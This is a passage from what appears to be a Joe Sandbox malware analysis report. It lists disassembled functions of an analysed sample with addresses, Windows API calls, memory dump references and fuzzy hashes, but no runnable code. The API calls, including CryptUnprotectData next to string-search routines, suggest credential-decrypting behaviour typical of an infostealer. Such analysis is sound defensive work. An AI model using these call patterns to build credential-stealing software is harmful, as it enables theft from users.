                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #${R$KIYA$U5$y ;c
                                  • API String ID: 0-3460542495
                                  • Opcode ID: 33a816737cd92e942a0e38428585bf8bc68f2593a15858341f4e1fddb14356af
                                  • Instruction ID: 238c6f391c6dcc4a2fd5a0d07983f11482eb47e8f0d3d8f9096e44dd93cf0696
                                  • Opcode Fuzzy Hash: 33a816737cd92e942a0e38428585bf8bc68f2593a15858341f4e1fddb14356af
                                  • Instruction Fuzzy Hash: 843207F3A08204AFD3046E2DEC8576ABBE5EF94720F1A493DE6C4C7744EA3598058797
                                  Function 007A2572 Relevance: 5.4, Strings: 3, Instructions: 1608COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 8w_$r.w$ylwB
                                  • API String ID: 0-974849845
                                  • Opcode ID: 251ab71ff8c5087d789cb3c5d21e6b88d10437d4f95f4b92e6916e5b54f779a7
                                  • Instruction ID: a8497ad8733bc06a2f9337c9c3d69925e30f93434cf64d155830a502212ea56b
                                  • Opcode Fuzzy Hash: 251ab71ff8c5087d789cb3c5d21e6b88d10437d4f95f4b92e6916e5b54f779a7
                                  • Instruction Fuzzy Hash: 6EB217F3A082049FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C7744E63558158697
                                  Function 007A5AD6 Relevance: 5.3, Strings: 3, Instructions: 1576COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C0T$QFfs$`!kz
                                  • API String ID: 0-1492128711
                                  • Opcode ID: 992278d85eac75f1a09d1f9bb44e220c9976bdd4fbc124bace23932a18943fb6
                                  • Instruction ID: 01c073846c925708e3361d7d7918145d9e290a16aa767d16162c635b8ec25a22
                                  • Opcode Fuzzy Hash: 992278d85eac75f1a09d1f9bb44e220c9976bdd4fbc124bace23932a18943fb6
                                  • Instruction Fuzzy Hash: 5BB2E6F360C2009FE3046E2DEC85A7ABBE5EF94720F164A3DEAC5C7744E63598058697
                                  Function 003FCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(0040B110,00000000,00000001,0040B100,?), ref: 003FCB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003FCB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 003FCBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: b667aa1bb7b1529af6577ccda83327fbeda6fa66252700b875deda3412c0b432
                                  • Instruction ID: 203e9e131b8020c6141e1984f35f25e85986e96a80dfdb2fd45168598d323636
                                  • Opcode Fuzzy Hash: b667aa1bb7b1529af6577ccda83327fbeda6fa66252700b875deda3412c0b432
                                  • Instruction Fuzzy Hash: 5A317575A40619BFD710DB94CC92FAAB7B9DB88B11F104194FB04EB2D0D7B0AE45CBA0
                                  Function 003E9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E9B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003E9BB3
                                  • LocalFree.KERNEL32(?), ref: 003E9BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 44313844f5bf1487fd9991b4edc027425bba4237795302450bcc3403c9887a46
                                  • Instruction ID: 1faa801e319c1fed1f8be58c0188eb0a76583dca89af371d6069b2dc2a2f1f71
                                  • Opcode Fuzzy Hash: 44313844f5bf1487fd9991b4edc027425bba4237795302450bcc3403c9887a46
                                  • Instruction Fuzzy Hash: CC011DB5A4121AAFE710DBA4DC55FABB779EB44B00F108555EE04AB280D7B09A008BE1
                                  Function 007A406C Relevance: 4.1, Strings: 2, Instructions: 1628COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6&lo$BB]
                                  • API String ID: 0-2211810277
                                  • Opcode ID: f577ad3eb83b7f7d42fd0066800caebd705ec2e7e74b95c3cc084efdc720f67b
                                  • Instruction ID: bc9a86fbc41d432b06f1a8bd9e62d5d3c0890f14c631c61c14cb15ffd49e3807
                                  • Opcode Fuzzy Hash: f577ad3eb83b7f7d42fd0066800caebd705ec2e7e74b95c3cc084efdc720f67b
                                  • Instruction Fuzzy Hash: 55B23BF3A0C2149FE304AE2DEC8567AFBE9EF94720F1A853DEAC4C3744E53558058696
                                  Function 006DFA77 Relevance: .2, Instructions: 216COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57b57c54a120c7a77001b44c02d3aa429687941ce9bc4735c0a131463aaaca30
                                  • Instruction ID: 03e91249e6764037e17a22fe0e9ac8dba9dc31fd8c7f91d89c00c43aa9d5015f
                                  • Opcode Fuzzy Hash: 57b57c54a120c7a77001b44c02d3aa429687941ce9bc4735c0a131463aaaca30
                                  • Instruction Fuzzy Hash: 546147B3A082049FE304AE2DDC4576AB7D6EFD4720F1A453DEAC0C7344E9796C458796
                                  Function 006AB9D9 Relevance: .2, Instructions: 200COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9478c27d8d46d17d6e0294926ac37dedbddbf9cae26495bc5e4fe49f80b32aca
                                  • Instruction ID: 48005839ba832035ceb20bbe5bbef6995670cbd21d7b0c55aaac9884d34cb822
                                  • Opcode Fuzzy Hash: 9478c27d8d46d17d6e0294926ac37dedbddbf9cae26495bc5e4fe49f80b32aca
                                  • Instruction Fuzzy Hash: A45157F3B182005FF7089929ED9477A77DADBD4310F2A853EEB89C7784E8795C058285
                                  Function 006A30B1 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a96826c8e2101663d0b73d820540f5d2c2ad7640ddfc5a488ce1efe0bb819a6b
                                  • Instruction ID: f6d44e018c64e08f6a0471d1952088c3c3434194b450f8f70faff57cca8109bf
                                  • Opcode Fuzzy Hash: a96826c8e2101663d0b73d820540f5d2c2ad7640ddfc5a488ce1efe0bb819a6b
                                  • Instruction Fuzzy Hash: 0B416EF3A082149BF3046A29EC857BAB7D6DB94720F1A833DDBC453B84D93D1C0582D6
                                  Function 00772DD5 Relevance: .2, Instructions: 150COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ea2e17c8eb2934af48ee991e2447001b77a45c751d49086c75a4be35a929379
                                  • Instruction ID: e206d28c4d1988daafe3e241e90c374c75c3ffb0a4b093fcc041dab842d96bc3
                                  • Opcode Fuzzy Hash: 3ea2e17c8eb2934af48ee991e2447001b77a45c751d49086c75a4be35a929379
                                  • Instruction Fuzzy Hash: CD416EF3E095109BF314AA2AEC4576BB7D7DBD4310F2B863DDAC097384E9794806C692
                                  Function 003F85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F8636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003F86AA
                                  • StrStrA.SHLWAPI(?,011B03B8), ref: 003F86CF
                                  • lstrcpyn.KERNEL32(006193D0,?,00000000), ref: 003F86EE
                                  • lstrlen.KERNEL32(?), ref: 003F8701
                                  • wsprintfA.USER32 ref: 003F8711
                                  • lstrcpy.KERNEL32(?,?), ref: 003F8727
                                  • StrStrA.SHLWAPI(?,011B03D0), ref: 003F8754
                                  • lstrcpy.KERNEL32(?,006193D0), ref: 003F87B4
                                  • StrStrA.SHLWAPI(?,011B06A0), ref: 003F87E1
                                  • lstrcpyn.KERNEL32(006193D0,?,00000000), ref: 003F8800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: 7376db06a3d9994d204709fba40877011de5eb70af0e203ec647ce1d95820363
                                  • Instruction ID: 84e4634cf5f3e60fddf7def287a33457c3f83d5ca98a8b444494f9531c0fb6c2
                                  • Opcode Fuzzy Hash: 7376db06a3d9994d204709fba40877011de5eb70af0e203ec647ce1d95820363
                                  • Instruction Fuzzy Hash: 2EF18371901118AFCB11DB74DD58AEAB7BAEF88340F19855AF909E7350DF70AE41CBA0
                                  Function 003E1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1F9F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003E1FAE
